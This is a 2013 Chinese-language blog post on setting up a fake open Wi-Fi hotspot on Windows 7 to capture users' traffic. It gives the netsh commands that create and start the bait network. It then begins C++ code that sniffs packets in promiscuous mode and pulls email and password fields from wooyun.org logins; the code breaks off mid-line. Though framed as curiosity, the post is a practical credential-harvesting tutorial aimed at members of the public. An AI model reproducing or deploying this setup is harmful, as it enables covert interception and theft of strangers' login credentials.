Windows下的无线热点蜜罐
/**************************************
/* 作者:半斤八兩
/* 博客:http://cnblogs.com/bjblcracked
/* 日期:2013-09-30 23:59
/**************************************
只是感兴趣,没有其他目的。失误之处敬请诸位大侠赐教!
在许多公共场所我们都会看到有许多免密码的无线热点.我们大多数的人发现有免密热点,都会很高兴的感慨, “运气真好,居然有不要密码的无线热点.” 可是否有人知道自己连上的是一个正在监视自己的眼睛?
WIFI即Hotspot也称无线热点,是指在公共场所提供无线局域网(WLAN)接入Internet服务的地点。这类地点多数是咖啡馆、机场、车站、商务酒店、高等院校、大型展览会馆等。这些热点有的是收费的提供无线宽带接入服务,有的则是免费的。在无线热点覆盖的地区,用户可以通过使用装有内置或外置无线网卡的笔记本电脑和PDA,来实现对Internet的接入。
试验平台:winn7 x86 台式机
工具: 无线网卡(USB)接收器
首先们来说一下怎样搭建wifi 蜜罐.
Win7下有一个命令可以创建个wifi.
netsh wlan set hostednetwork ssid=pass:123456789 key=123456789
Ssid 就是上图中显示的东西.
防止别人不知道密码,我们就改成 pass:123456789
Key 我们就直接弄成 123456789
这里要注意, ssid 尽量不要弄中文的.经本人测试,发现iphone不支持中文ssid.
然后我们用命令启动它.
netsh wlan start hostednetwork
这一些前提是我们要先插上wifi 接收器.
否则我们创建虚拟wifi 是不会成功的.
现在创建好了,我们写个抓包小程序,就可以等着chicken上勾就行了.
抓包我们要用混杂模式. 混杂模式可以抓到当前电脑所有网卡数据包.
1 #include <stdio.h> 2 #include <winsock2.h> 3 #include "DataStruct.h" 4 #include "InitSocket.h" 5 #include <iostream> 6 #include "mstcpip.h" 7 using namespace std; 8 CInitSocket initSock; 9 10 int nRet = 0; 11 void IsWifiHoneypots(PCHAR pBuff) 12 { 13 PIPHEADER pIphdr = (PIPHEADER)pBuff; 14 15 pBuff += (pIphdr->ipVersion & 0xf) * sizeof(ULONG); 16 17 PTCPHEADER pTcpHdr = (PTCPHEADER)pBuff; 18 19 memset(szText, ' ', nRet); 20 21 int dataLen = nRet - sizeof(IPHEADER) - sizeof(TCPHEADER); 22 23 memcpy(szText, &pBuff[sizeof(TCPHEADER)], dataLen); 24 25 int i = 0; 26 char szEmail[MAXBYTE] = {0}; 27 PCHAR pEmail = szEmail; 28 29 30 if(strstr(szText, "wooyun.org")) 31 if(strstr(szText, "email")) 32 { 33 puts("--------------------------------------------"); 34 cout<<"found Wooyun.org password:" << endl; 35 36 pEmail = strstr(szText, "email"); 37 38 for(i = 0; (pEmail[i] != '&'); i++); 39 40 pEmail[i] = '